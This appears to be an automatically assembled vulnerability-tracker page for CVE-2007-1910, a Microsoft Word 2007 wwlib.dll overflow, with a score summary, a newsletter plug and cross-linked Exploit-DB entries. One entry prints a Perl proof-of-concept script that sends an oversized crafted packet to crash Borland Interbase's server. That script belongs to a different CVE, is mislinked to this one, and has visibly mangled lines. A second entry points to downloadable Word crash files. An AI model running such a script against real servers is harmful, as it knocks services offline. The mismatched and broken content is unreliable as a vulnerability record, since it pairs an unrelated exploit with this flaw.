CVE-2007-1910
published 2007-04-10CVE-2007-1910: Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
24.95%
97.6th percentile
Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document, as demonstrated by file789-1.doc.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | word | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)
exploitdb·2008-04-11
CVE-2008-1910 Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)
Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)
---
###############################################################################################################
# POC.pl #
###############################################################################################################
#!/usr/bin/perl -w
#Author: Liu Zhen Hua
use IO::Socket;
use strict;
my $host=$ARGV[0];
sub usage {
print "usage: perl poc.pl serverip\n";
}
if ($#ARGV new(Proto=>'tcp',
PeerAddr=>$host,
PeerPort=>3050);
my $pad0 = "\x41"x1000; #"\x00\x00\x03\xE8"
my $pad5 = "\x43"x16;
my $exploit = "\x00\x00\x00\x52\xFF\xFF\xFF\xFF\x00\x00\x03\xE8".$pad0."\x00\x00\x00\x10".$pad5;
print $victim $exploit ;
print " + Malicious request sent ...\n";
sleep(1);
print "Done.\n";
close($victim);
exit;
# milw0rm.com
Exploit-DB
Microsoft Word 2007 - Multiple Vulnerabilities
exploitdb·2007-04-09
CVE-2007-1911 Microsoft Word 2007 - Multiple Vulnerabilities
Microsoft Word 2007 - Multiple Vulnerabilities
---
# Mati Aharoni
# muts [.@.] offensive-security.com
# http://www.offensive-security.com
My 7 line python fuzzer found several file format bugs in 3 hours. Quite alarming.
No deep analysis was done, I leave that to the community.
These are some of the results:
file789-1.doc - Unspecified Overflow in word 2007 - Crash in wwlib.dll . Code execution is not trivial.
file798-1.doc . Word 2007 CPU exhaustion DOS - CPU shoots up to 100 %.
file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, and windows goes .ding!.
These files can be found at http://www.offensive-security.com/0day/0day.tar.gz
backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3690.tar.gz (04092007-0day.ta
No writeups or analysis indexed.
2007-04-10
Published